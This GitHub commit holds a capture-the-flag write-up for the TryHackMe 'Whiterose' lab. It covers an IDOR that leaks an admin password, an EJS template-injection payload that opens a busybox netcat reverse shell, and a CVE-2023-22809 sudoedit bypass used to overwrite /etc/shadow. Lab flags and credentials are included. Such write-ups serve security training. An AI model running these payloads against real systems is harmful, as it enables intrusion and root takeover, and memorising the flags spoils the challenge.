Skip to content

Commit

Permalink
Whiterose
Browse files Browse the repository at this point in the history 
IDOR on website's messages revealed admin pass
EJS SSTI exploit (mde/ejs#735)
CVE-2023-22809: Sudoedit Bypass
  • Loading branch information
@s0m312
s0m312 authored Nov 6, 2024
0 parents commit 0ccf309
Showing 1 changed file with 28 additions and 0 deletions.
28 changes: 28 additions & 0 deletions Whiterose
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
Q: What's Tyrell Wellick's phone number?
A: 842-029-5701
1) nmap scan shows, port 22 and 80 are open
2) navigate to port 80 via browser, shows domain cyprusbank.thm (add to /etc/hosts)
3) cyprusbank.thm didnt show much, so with gobuster vhost found subdomain admin.cyprusbank.thm (add to /etc/hosts)
4) creds that was given "Olivia Cortez:olivi8" worked there.
5) navigate to "messages" and at url can be seen http://admin.cyprusbank.thm/messages/?c=5 , tryed to lower the parameter 'c' and at 0 it showed "Gayle Bev":"p~]P@5!6;rs558:q"
6) logged in as Gayle Bev and phones numbers can be seen.

Q: User flag?
A: THM{4lways_upd4te_uR_d3p3nd3nc!3s}
1) after entering as Gayle Bev, the 'settings' tab on the site can be accessable.
2) via burp-suite repeater I've played abit with the request, and it doesnt actually changes the user's password, so i tryed to delete the parameter of 'password' and it reveals some embeded js files (EJS).
3) Via google, found SSTI for EJS, and the payload looked like this: (had to use BusyBox since my nc and target's nc didnt match verions and without it, i couldnt execute commands)
name=1&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('busybox nc <IP> 1234 -e /bin/sh');
4) logged in as user 'web' and it had the flag in hes home dir.

Q: root flag?
A: THM{4nd_uR_p4ck4g3s}
1) upgraded shell via python3 and stty raw...
2) sudo -l , revealed the user can execute without pass this:
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
3) searched exploit for sudoedit 1.9.12p1, found this usefull:
https://www.vicarius.io/vsociety/posts/cve-2023-22809-sudoedit-bypass-analysis
4) export EDITOR="nano -- /etc/shadow"
5) (on my kali) openssl passwd -6 <new pass for root>
6) run "sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm"
7) replaced root's password and did 'su root' (with my new pass)

0 comments on commit 0ccf309

Please sign in to comment.